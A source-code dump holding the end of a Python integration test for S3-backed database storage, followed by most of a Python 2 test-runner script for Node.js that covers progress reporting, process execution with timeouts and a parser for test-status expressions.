list(minio.list_objects(cluster.minio_bucket, 'data/'))) == FILES_OVERHEAD
def test_s3_disk_apply_new_settings(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
def get_s3_requests():
node.query("SYSTEM FLUSH LOGS")
return int(node.query("SELECT value FROM system.events WHERE event='S3WriteRequestsCount'"))
s3_requests_before = get_s3_requests()
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-03', 4096)))
s3_requests_to_write_partition = get_s3_requests() - s3_requests_before
# Force multi-part upload mode.
replace_config("<s3_max_single_part_upload_size>33554432</s3_max_single_part_upload_size>",
"<s3_max_single_part_upload_size>0</s3_max_single_part_upload_size>")
node.query("SYSTEM RELOAD CONFIG")
s3_requests_before = get_s3_requests()
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 4096, -1)))
# There should be 3 times more S3 requests because multi-part upload mode uses 3 requests to upload object.
assert get_s3_requests() - s3_requests_before == s3_requests_to_write_partition * 3
def test_s3_disk_restart_during_load(cluster):
create_table(cluster, "s3_test")
node = cluster.instances["node"]
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-04', 1024 * 1024)))
node.query("INSERT INTO s3_test VALUES {}".format(generate_values('2020-01-05', 1024 * 1024, -1)))
def read():
for ii in range(0, 20):
logging.info("Executing %d query", ii)
assert node.query("SELECT sum(id) FROM s3_test FORMAT Values") == "(0)"
logging.info("Query %d executed", ii)
time.sleep(0.2)
def restart_disk():
for iii in range(0, 5):
logging.info("Restarting disk, attempt %d", iii)
node.query("SYSTEM RESTART DISK s3")
logging.info("Disk restarted, attempt %d", iii)
time.sleep(0.5)
threads = []
for i in range(0, 4):
threads.append(SafeThread(target=read))
threads.append(SafeThread(target=restart_disk))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import logging
import optparse
import os
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
import utils
import multiprocessing
import errno
import copy
import ast
from os.path import join, dirname, abspath, basename, isdir, exists
from datetime import datetime
from Queue import Queue, Empty
logger = logging.getLogger('testrunner')
skip_regex = re.compile(r'# SKIP\S*\s+(.*)', re.IGNORECASE)
VERBOSE = False
os.environ['NODE_OPTIONS'] = ''
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases, flaky_tests_mode):
self.cases = cases
self.flaky_tests_mode = flaky_tests_mode
self.parallel_queue = Queue(len(cases))
self.sequential_queue = Queue(len(cases))
for case in cases:
if case.parallel:
self.parallel_queue.put_nowait(case)
else:
self.sequential_queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.flaky_failed = [ ]
self.crashed = 0
self.lock = threading.Lock()
self.shutdown_event = threading.Event()
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print "=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
}
print "Path: %s" % "/".join(test.path)
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in xrange(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[True, i + 1])
threads.append(thread)
thread.start()
try:
self.RunSingle(False, 0)
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=10000000)
except (KeyboardInterrupt, SystemExit), e:
self.shutdown_event.set()
except Exception, e:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.shutdown_event.set()
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self, parallel, thread_id):
while not self.shutdown_event.is_set():
try:
test = self.parallel_queue.get_nowait()
except Empty:
if parallel:
return
try:
test = self.sequential_queue.get_nowait()
except Empty:
return
case = test.case
case.thread_id = thread_id
self.lock.acquire()
self.AboutToRun(case)
self.lock.release()
try:
start = datetime.now()
output = case.Run()
# SmartOS has a bug that causes unexpected ECONNREFUSED errors.
# See https://smartos.org/bugview/OS-2767
# If ECONNREFUSED on SmartOS, retry the test one time.
if (output.UnexpectedOutput() and
sys.platform == 'sunos5' and
'ECONNREFUSED' in output.output.stderr):
output = case.Run()
output.diagnostic.append('ECONNREFUSED received, test retried')
case.duration = (datetime.now() - start)
except IOError, e:
return
if self.shutdown_event.is_set():
return
self.lock.acquire()
if output.UnexpectedOutput():
if FLAKY in output.test.outcomes and self.flaky_tests_mode == DONTCARE:
self.flaky_failed.append(output)
else:
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces. We may need to escape more characters for this
# to work properly.
parts.append('"%s"' % part)
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print 'Running %i tests' % len(self.cases)
def Done(self):
print
for failed in self.failed:
self.PrintFailureHeader(failed.test)
if failed.output.stderr:
print "--- stderr ---"
print failed.output.stderr.strip()
if failed.output.stdout:
print "--- stdout ---"
print failed.output.stdout.strip()
print "Command: %s" % EscapeCommand(failed.command)
if failed.HasCrashed():
print "--- %s ---" % PrintCrashed(failed.output.exit_code)
if failed.HasTimedOut():
print "--- TIMEOUT ---"
if len(self.failed) == 0:
print "==="
print "=== All tests succeeded"
print "==="
else:
print
print "==="
print "=== %i tests failed" % len(self.failed)
if self.crashed > 0:
print "=== %i tests CRASHED" % self.crashed
print "==="
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print 'Starting %s...' % case.GetLabel()
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print 'Done running %s: %s' % (output.test.GetLabel(), outcome)
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class TapProgressIndicator(SimpleProgressIndicator):
def _printDiagnostic(self):
logger.info(' severity: %s', self.severity)
self.exitcode and logger.info(' exitcode: %s', self.exitcode)
logger.info(' stack: |-')
for l in self.traceback.splitlines():
logger.info(' ' + l)
def Starting(self):
logger.info('TAP version 13')
logger.info('1..%i' % len(self.cases))
self._done = 0
def AboutToRun(self, case):
pass
def HasRun(self, output):
self._done += 1
self.traceback = ''
self.severity = 'ok'
self.exitcode = ''
# Print test name as (for example) "parallel/test-assert". Tests that are
# scraped from the addons documentation are all named test.js, making it
# hard to decipher what test is running when only the filename is printed.
prefix = abspath(join(dirname(__file__), '../test')) + os.sep
command = output.command[-1]
command = NormalizePath(command, prefix)
if output.UnexpectedOutput():
status_line = 'not ok %i %s' % (self._done, command)
self.severity = 'fail'
self.exitcode = output.output.exit_code
self.traceback = output.output.stdout + output.output.stderr
if FLAKY in output.test.outcomes and self.flaky_tests_mode == DONTCARE:
status_line = status_line + ' # TODO : Fix flaky test'
self.severity = 'flaky'
logger.info(status_line)
if output.HasCrashed():
self.severity = 'crashed'
elif output.HasTimedOut():
self.severity = 'fail'
else:
skip = skip_regex.search(output.output.stdout)
if skip:
logger.info(
'ok %i %s # skip %s' % (self._done, command, skip.group(1)))
else:
status_line = 'ok %i %s' % (self._done, command)
if FLAKY in output.test.outcomes:
status_line = status_line + ' # TODO : Fix flaky test'
logger.info(status_line)
if output.diagnostic:
self.severity = 'ok'
      self.traceback = '\n'.join(output.diagnostic)
duration = output.test.duration
# total_seconds() was added in 2.7
total_seconds = (duration.microseconds +
(duration.seconds + duration.days * 24 * 3600) * 10**6) / 10**6
# duration_ms is measured in seconds and is read as such by TAP parsers.
# It should read as "duration including ms" rather than "duration in ms"
logger.info(' ---')
logger.info(' duration_ms: %d.%d' %
(total_seconds, duration.microseconds / 1000))
    if self.severity != 'ok' or self.traceback != '':
if output.HasTimedOut():
self.traceback = 'timeout\n' + output.output.stdout + output.output.stderr
self._printDiagnostic()
logger.info(' ...')
def Done(self):
pass
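# Illustrative only (not part of the runner): for a hypothetical two-test run,
# the TAP stream emitted by TapProgressIndicator above would look roughly like
# the following, with the duration block always present and the diagnostic
# fields only added for non-ok results:
#
#   TAP version 13
#   1..2
#   ok 1 parallel/test-assert
#     ---
#     duration_ms: 0.245
#     ...
#   not ok 2 parallel/test-buffer
#     ---
#     duration_ms: 1.102
#     severity: fail
#     exitcode: 1
#     stack: |-
#       AssertionError: 1 == 2
#     ...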
class DeoptsCheckProgressIndicator(SimpleProgressIndicator):
def Starting(self):
pass
def AboutToRun(self, case):
pass
def HasRun(self, output):
# Print test name as (for example) "parallel/test-assert". Tests that are
# scraped from the addons documentation are all named test.js, making it
# hard to decipher what test is running when only the filename is printed.
prefix = abspath(join(dirname(__file__), '../test')) + os.sep
command = output.command[-1]
command = NormalizePath(command, prefix)
stdout = output.output.stdout.strip()
printed_file = False
for line in stdout.splitlines():
if (line.startswith("[aborted optimiz") or \
line.startswith("[disabled optimiz")) and \
("because:" in line or "reason:" in line):
if not printed_file:
printed_file = True
print '==== %s ====' % command
self.failed.append(output)
print ' %s' % line
def Done(self):
pass
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, flaky_tests_mode, templates):
super(CompactProgressIndicator, self).__init__(cases, flaky_tests_mode)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print self.templates['stdout'] % stdout
stderr = output.output.stderr.strip()
if len(stderr):
print self.templates['stderr'] % stderr
print "Command: %s" % EscapeCommand(output.command)
if output.HasCrashed():
print "--- %s ---" % PrintCrashed(output.output.exit_code)
if output.HasTimedOut():
print "--- TIMEOUT ---"
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print status,
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print "\033[1K\r",
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
'max_length': 78
}
super(MonochromeProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print ("\r" + (" " * last_line_length) + "\r"),
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'color': ColorProgressIndicator,
'tap': TapProgressIndicator,
'mono': MonochromeProgressIndicator,
'deopts': DeoptsCheckProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, arch, mode):
self.path = path
self.context = context
self.duration = None
self.arch = arch
self.mode = mode
self.parallel = False
self.disable_core_files = False
self.thread_id = 0
def IsNegative(self):
return self.context.expect_fail
def CompareTime(self, other):
return cmp(other.duration, self.duration)
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command, env):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self.mode),
env,
disable_core_files = self.disable_core_files)
self.Cleanup()
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def BeforeRun(self):
pass
def AfterRun(self, result):
pass
def Run(self):
self.BeforeRun()
try:
result = self.RunCommand(self.GetCommand(), {
"TEST_THREAD_ID": "%d" % self.thread_id
})
finally:
      # Tests can leave the tty in non-blocking mode. If the test runner
      # tries to print to stdout/stderr after that and the tty buffer is
      # full, it'll die with an EAGAIN OSError. Ergo, put the tty back in
      # blocking mode before proceeding.
if sys.platform != 'win32':
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK
for fd in 0,1,2: fcntl(fd, F_SETFL, ~O_NONBLOCK & fcntl(fd, F_GETFL))
self.AfterRun(result)
return result
def Cleanup(self):
return
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
self.diagnostic = []
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0
def HasTimedOut(self):
    return self.output.timed_out
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid, signal_to_send=signal.SIGTERM):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal_to_send)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
    prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode)
except ImportError:
pass
return prev_error_mode
def KillTimedOutProcess(context, pid):
signal_to_send = signal.SIGTERM
if context.abort_on_timeout:
# Using SIGABRT here allows the OS to generate a core dump that can be
# looked at post-mortem, which helps for investigating failures that are
# difficult to reproduce.
signal_to_send = signal.SIGABRT
KillProcessWithID(pid, signal_to_send)
def RunProcess(context, timeout, args, **rest):
if context.verbose: print "#", " ".join(args)
popen_args = args
  prev_error_mode = SEM_INVALID_VALUE
if utils.IsWindows():
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
      error_mode = SEM_NOGPFAULTERRORBOX
      prev_error_mode = Win32SetErrorMode(error_mode)
      Win32SetErrorMode(error_mode | prev_error_mode)
faketty = rest.pop('faketty', False)
pty_out = rest.pop('pty_out')
process = subprocess.Popen(
args = popen_args,
**rest
)
if faketty:
os.close(rest['stdout'])
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
output = ''
if faketty:
while True:
      if end_time is not None and time.time() >= end_time:
# Kill the process and wait for it to exit.
KillTimedOutProcess(context, process.pid)
exit_code = process.wait()
timed_out = True
break
# source: http://stackoverflow.com/a/12471855/1903116
# related: http://stackoverflow.com/q/11165521/1903116
try:
data = os.read(pty_out, 9999)
except OSError as e:
if e.errno != errno.EIO:
raise
break # EIO means EOF on some systems
else:
if not data: # EOF
break
output += data
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillTimedOutProcess(context, process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out, output)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
while True:
try:
os.unlink(name)
except OSError, e:
# On Windows unlink() fails if another process (typically a virus scanner
# or the indexing service) has the file open. Those processes keep a
# file open for a short time only, so yield and try again; it'll succeed.
if sys.platform == 'win32' and e.errno == errno.EACCES:
time.sleep(0)
continue
PrintError("os.unlink() " + str(e))
break
def Execute(args, context, timeout=None, env={}, faketty=False, disable_core_files=False):
if faketty:
import pty
(out_master, fd_out) = pty.openpty()
fd_in = fd_err = fd_out
pty_out = out_master
else:
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
fd_in = 0
pty_out = None
env_copy = os.environ.copy()
# Remove NODE_PATH
if "NODE_PATH" in env_copy:
del env_copy["NODE_PATH"]
# Extend environment
for key, value in env.iteritems():
env_copy[key] = value
preexec_fn = None
if disable_core_files and not utils.IsWindows():
def disableCoreFiles():
import resource
resource.setrlimit(resource.RLIMIT_CORE, (0,0))
preexec_fn = disableCoreFiles
(process, exit_code, timed_out, output) = RunProcess(
context,
timeout,
args = args,
stdin = fd_in,
stdout = fd_out,
stderr = fd_err,
env = env_copy,
faketty = faketty,
pty_out = pty_out,
preexec_fn = preexec_fn
)
if faketty:
os.close(out_master)
errors = ''
else:
os.close(fd_out)
os.close(fd_err)
output = file(outname).read()
errors = file(errname).read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
class TestConfiguration(object):
def __init__(self, context, root):
self.context = context
self.root = root
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in xrange(len(path)):
if not path[i].match(NormalizePath(file[i])):
return False
return True
def GetTestStatus(self, sections, defs):
pass
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
file = None
try:
(file, pathname, description) = imp.find_module('testcfg', [ self.path ])
module = imp.load_module('testcfg', file, pathname, description)
self.config = module.GetConfiguration(context, self.path)
if hasattr(self.config, 'additional_flags'):
self.config.additional_flags += context.node_args
else:
self.config.additional_flags = context.node_args
finally:
if file:
file.close()
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def AddTestsToList(self, result, current_path, path, context, arch, mode):
tests = self.GetConfiguration(context).ListTests(current_path, path,
arch, mode)
result += tests
for i in range(1, context.repeat):
result += copy.deepcopy(tests)
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests):
super(LiteralTestSuite, self).__init__('root')
self.tests = tests
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def ListTests(self, current_path, path, context, arch, mode):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, arch, mode)
result.sort(cmp=lambda a, b: cmp(a.GetName(), b.GetName()))
return result
def GetTestStatus(self, context, sections, defs):
for test in self.tests:
test.GetTestStatus(context, sections, defs)
TIMEOUT_SCALEFACTOR = {
'armv6' : { 'debug' : 12, 'release' : 3 }, # The ARM buildbots are slow.
'arm' : { 'debug' : 8, 'release' : 2 },
'ia32' : { 'debug' : 4, 'release' : 1 },
'ppc' : { 'debug' : 4, 'release' : 1 },
's390' : { 'debug' : 4, 'release' : 1 } }
class Context(object):
def __init__(self, workspace, buildspace, verbose, vm, args, expect_fail,
timeout, processor, suppress_dialogs,
store_unexpected_output, repeat, abort_on_timeout):
self.workspace = workspace
self.buildspace = buildspace
self.verbose = verbose
self.node_args = args
self.expect_fail = expect_fail
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
self.repeat = repeat
self.abort_on_timeout = abort_on_timeout
self.v8_enable_inspector = True
def GetVm(self, arch, mode):
if arch == 'none':
name = 'out/Debug/node' if mode == 'debug' else 'out/Release/node'
else:
name = 'out/%s.%s/node' % (arch, mode)
# Currently GYP does not support output_dir for MSVS.
# http://code.google.com/p/gyp/issues/detail?id=40
# It will put the builds into Release/node.exe or Debug/node.exe
if utils.IsWindows():
if not exists(name + '.exe'):
name = name.replace('out/', '')
name = os.path.abspath(name + '.exe')
if not exists(name):
raise ValueError('Could not find executable. Should be ' + name)
return name
def GetTimeout(self, mode):
return self.timeout * TIMEOUT_SCALEFACTOR[ARCH_GUESS or 'ia32'][mode]
def RunTestCases(cases_to_run, progress, tasks, flaky_tests_mode):
progress = PROGRESS_INDICATORS[progress](cases_to_run, flaky_tests_mode)
return progress.Run(tasks)
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
FLAKY = 'flaky'
DONTCARE = 'dontcare'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return ListSet([env[self.name]])
else: return Nothing()
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return ListSet([self.name])
class Set(object):
pass
class ListSet(Set):
def __init__(self, elms):
self.elms = elms
def __str__(self):
return "ListSet%s" % str(self.elms)
def Intersect(self, that):
if not isinstance(that, ListSet):
return that.Intersect(self)
return ListSet([ x for x in self.elms if x in that.elms ])
def Union(self, that):
if not isinstance(that, ListSet):
return that.Union(self)
return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])
def IsEmpty(self):
return len(self.elms) == 0
class Nothing(Set):
def Intersect(self, that):
return self
def Union(self, that):
return that
def IsEmpty(self):
return True
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return not inter.IsEmpty()
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
elif self.op == 'if':
if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
else: return Nothing()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
else:
return None
return self.tokens
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left= Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print "Malformed expression: '%s'" % expr
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print "Malformed expression: '%s'" % expr
return None
if scan.HasMore():
print "Malformed expression: '%s'" % expr
return None
return ast
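# Minimal usage sketch (names and env values are illustrative): a status-file
# condition is parsed once with ParseCondition and then evaluated against the
# env dict that Main() builds ('mode', 'system', 'arch', 'type').
def _parse_condition_example():
  condition = ParseCondition('$mode==debug && $arch==arm')
  assert condition.Evaluate({'mode': 'debug', 'arch': 'arm'}, {})
  assert not condition.Evaluate({'mode': 'release', 'arch': 'arm'}, {})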
class ClassifiedTest(object):
def __init__(self, case, outcomes):
self.case = case
self.outcomes = outcomes
self.parallel = self.case.parallel
self.disable_core_files = self.case.disable_core_files
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
